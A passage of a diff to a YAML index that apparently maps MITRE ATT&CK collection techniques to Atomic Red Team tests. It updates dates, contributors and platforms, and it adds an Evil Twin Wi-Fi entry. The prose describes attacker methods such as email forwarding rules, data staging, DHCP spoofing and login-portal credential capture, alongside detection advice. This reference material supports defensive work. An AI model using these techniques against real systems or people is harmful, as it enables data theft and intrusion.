         url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
         description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
           .ost). Retrieved February 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T17:59:20.983Z'
       name: 'Email Collection: Local Email Collection'
       description: |-
         Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
@@ -47925,13 +48408,11 @@ collection:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1114.001
     atomic_tests: []
   T1119:
     technique:
-      modified: '2024-01-02T13:35:57.680Z'
+      modified: '2024-09-25T20:40:07.791Z'
       name: Automated Collection
       description: "Once established within a system or network, an adversary may
         use automated techniques for collecting internal data. Methods for performing
@@ -47952,6 +48433,7 @@ collection:
         phase_name: collection
       x_mitre_contributors:
       - Praetorian
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Depending on the method used, actions could include common
         file system commands and parameters on the command-line interface within batch
@@ -47975,8 +48457,10 @@ collection:
       - Windows
       - IaaS
       - SaaS
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
+      - 'User Account: User Account Authentication'
       - 'Command: Command Execution'
       - 'File: File Access'
       - 'Script: Script Execution'
@@ -48001,7 +48485,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1119
     atomic_tests: []
   T1115:
@@ -48068,7 +48551,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1115
     atomic_tests:
     - name: Add or copy content to clipboard with xClip
@@ -48088,7 +48570,7 @@ collection:
         name: sh
   T1530:
     technique:
-      modified: '2023-09-29T16:11:43.530Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Data from Cloud Storage Object
       description: "Adversaries may access data from cloud storage.\n\nMany IaaS providers
         offer solutions for online data object storage such as Amazon S3, Azure Storage,
@@ -48122,10 +48604,12 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Netskope
       - Praetorian
       - AppOmni
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
         service. Activity originating from unexpected sources may indicate improper
@@ -48136,13 +48620,14 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Office 365
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Metadata'
       - 'Cloud Storage: Cloud Storage Access'
       type: attack-pattern
       id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
@@ -48183,37 +48668,11 @@ collection:
         url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1530
     atomic_tests: []
   T1074.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - IaaS
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
-      type: attack-pattern
-      created: '2020-03-13T21:14:58.206Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074.002
-        url: https://attack.mitre.org/techniques/T1074/002
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.414Z'
       name: Remote Data Staging
       description: |-
         Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
@@ -48224,23 +48683,47 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Command: Command Execution'
       - 'File: File Access'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
+      created: '2020-03-13T21:14:58.206Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074/002
+        external_id: T1074.002
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-12T23:54:39.466Z'
       name: Data from Local System
       description: |
         Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
@@ -48310,7 +48793,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1005
     atomic_tests:
     - name: Find and dump sqlite databases (Linux)
@@ -48383,7 +48865,7 @@ collection:
         description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
           April 22, 2016.
         source_name: Wikipedia File Header Signatures
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T18:27:30.891Z'
       name: 'Archive Collected Data: Archive via Library'
       description: |-
         An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
@@ -48402,8 +48884,6 @@ collection:
       x_mitre_data_sources:
       - 'Script: Script Execution'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1560.002
     atomic_tests:
     - name: Compressing data using GZip in Python (FreeBSD/Linux)
@@ -48550,6 +49030,87 @@ collection:
         cleanup_command: 'rm #{path_to_output_file}
 
           '
+  T1557.004:
+    technique:
+      modified: '2024-11-11T18:52:53.686Z'
+      name: Evil Twin
+      description: "Adversaries may host seemingly genuine Wi-Fi access points to
+        deceive users into connecting to malicious networks as a way of supporting
+        follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+        [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+        or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+        ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+        network, fraudulent Wi-Fi access points may trick devices or users into connecting
+        to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+        evil twin)  Adversaries may provide a stronger signal strength or block access
+        to Wi-Fi access points to coerce or entice victim devices into connecting
+        to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple
+        – a network security auditing and penetration testing tool – may be deployed
+        in Evil Twin attacks for ease of use and broader range. Custom certificates
+        may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+        may also listen for client devices sending probe requests for known or previously
+        connected networks (Preferred Network Lists or PNLs). When a malicious access
+        point receives a probe request, adversaries can respond with the same SSID
+        to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim
+        devices are led to believe the responding access point is from their PNL and
+        initiate a connection to the fraudulent network.\n\nUpon logging into the
+        malicious Wi-Fi access point, a user may be directed to a fake login page
+        or captive portal webpage to capture the victim’s credentials. Once a user
+        is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+        network activity, manipulate data, or steal additional credentials. Locations
+        with high concentrations of public Wi-Fi access, such as airports, coffee
+        shops, or libraries, may be targets for adversaries to set up illegitimate
+        Wi-Fi access points. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - DeFord L. Smith
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      type: attack-pattern
+      id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+      created: '2024-09-17T14:27:40.947Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1557/004
+        external_id: T1557.004
+      - source_name: Kaspersky evil twin
+        description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+          them. Retrieved September 17, 2024.
+        url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+      - source_name: medium evil twin
+        description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+          Attack. Retrieved September 17, 2024.
+        url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+      - source_name: specter ops evil twin
+        description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+          Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+          17, 2024.
+        url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+      - source_name: Australia ‘Evil Twin’
+        description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+          WiFi attack on plane. Retrieved September 17, 2024.
+        url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1602.002:
     technique:
       x_mitre_platforms:
@@ -48578,7 +49139,7 @@ collection:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
         description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
           by Cyber Actors. Retrieved October 2, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-17T19:50:46.948Z'
       name: Network Device Configuration Dump
       description: "Adversaries may access network configuration files to collect
         sensitive data about the device and the network. The network configuration
@@ -48608,8 +49169,6 @@ collection:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1560:
     technique:
@@ -48663,7 +49222,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1560
     atomic_tests: []
   T1185:
@@ -48700,7 +49258,7 @@ collection:
         description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
           Retrieved May 24, 2017.
         source_name: cobaltstrike manual
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-25T18:58:15.229Z'
       name: Browser Session Hijacking
       description: |-
         Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
@@ -48728,12 +49286,10 @@ collection:
       - Administrator
       - SYSTEM
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1557.003:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-09-12T19:46:04.759Z'
       name: DHCP Spoofing
       description: "Adversaries may redirect network traffic to adversary-owned systems
         by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -48770,23 +49326,23 @@ collection:
         phase_name: credential-access
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Alex Spivakovsky, Pentera
+      - Andrew Allen, @whitehat_zero
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
         involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
         monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
         specify that the IP allocations are low or have run out; these EIDs may indicate
         a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Alex Spivakovsky, Pentera
-      - Andrew Allen, @whitehat_zero
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -48819,21 +49375,20 @@ collection:
       - source_name: solution_monitor_dhcp_scopes
         description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
           and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
-          March 7, 2022.'
-        url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+          September 12, 2024.'
+        url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
       - source_name: w32.tidserv.g
         description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
           14, 2022.
         url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1557.001:
     technique:
-      modified: '2023-04-25T14:00:00.188Z'
+      modified: '2022-10-25T15:46:55.393Z'
       name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
       description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
         spoof an authoritative source for name resolution to force communication with
@@ -48941,12 +49496,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1557.001
     atomic_tests: []
   T1056.003:
     technique:
-      modified: '2023-03-30T21:01:46.711Z'
+      modified: '2024-10-15T16:43:43.849Z'
       name: Web Portal Capture
       description: |-
         Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -48957,13 +49511,13 @@ collection:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: File monitoring may be used to detect changes to files in
         the Web directory for organization login pages that do not match with authorized
         updates to the Web server's content.
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -48977,6 +49531,7 @@ collection:
       id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
       created: '2020-02-11T18:59:50.058Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056/003
@@ -48987,12 +49542,12 @@ collection:
         url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1125:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.205Z'
       name: Video Capture
       description: |-
         An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
@@ -49037,30 +49592,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1125
     atomic_tests: []
   T1213.001:
     technique:
-      x_mitre_platforms:
-      - SaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
-      type: attack-pattern
-      created: '2020-02-14T13:09:51.004Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1213.001
-        url: https://attack.mitre.org/techniques/T1213/001
-      - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
-        description: Atlassian. (2018, January 9). How to Enable User Access Logging.
-          Retrieved April 4, 2018.
-        source_name: Atlassian Confluence Logging
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-30T13:45:42.840Z'
       name: Confluence
       description: |2
 
@@ -49070,31 +49606,48 @@ collection:
         * Physical / logical network diagrams
         * System architecture diagrams
         * Technical system documentation
-        * Testing / development credentials
+        * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
         * Work / project schedules
         * Source code snippets
         * Links to network shares and other internal resources
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
 
         User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
+      created: '2020-02-14T13:09:51.004Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/001
+        external_id: T1213.001
+      - source_name: Atlassian Confluence Logging
+        description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+          Retrieved April 4, 2018.
+        url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1114.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Email Collection: Email Forwarding Rule'
       description: "Adversaries may setup email forwarding rules to collect sensitive
         information. Adversaries may abuse email forwarding rules to monitor the activities
@@ -49127,10 +49680,12 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Security
       - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
       - Liran Ravich, CardinalOps
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
@@ -49139,16 +49694,17 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - Windows
-      - Google Workspace
       - macOS
       - Linux
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
+      - 'Cloud Service: Cloud Service Metadata'
       type: attack-pattern
       id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
       created: '2020-02-19T18:54:47.103Z'
@@ -49180,70 +49736,66 @@ collection:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1114.003
     atomic_tests: []
   T1074:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - IaaS
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      - Shane Tully, @securitygypsy
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
-      created: '2017-05-31T21:30:58.938Z'
-      x_mitre_version: '1.4'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074
-        url: https://attack.mitre.org/techniques/T1074
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: PWC Cloud Hopper April 2017
-        url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
-        description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
-          April 5, 2017.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-30T13:28:37.415Z'
+      name: Data Staged
       description: |-
         Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
 
         In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
 
         Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
-      modified: '2022-11-08T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Data Staged
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Praetorian
+      - Shane Tully, @securitygypsy
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
 
         Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: collection
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Command: Command Execution'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
+      created: '2017-05-31T21:30:58.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074
+        external_id: T1074
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: PWC Cloud Hopper April 2017
+        description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
+          April 5, 2017.
+        url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.002:
     technique:
@@ -49316,7 +49868,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
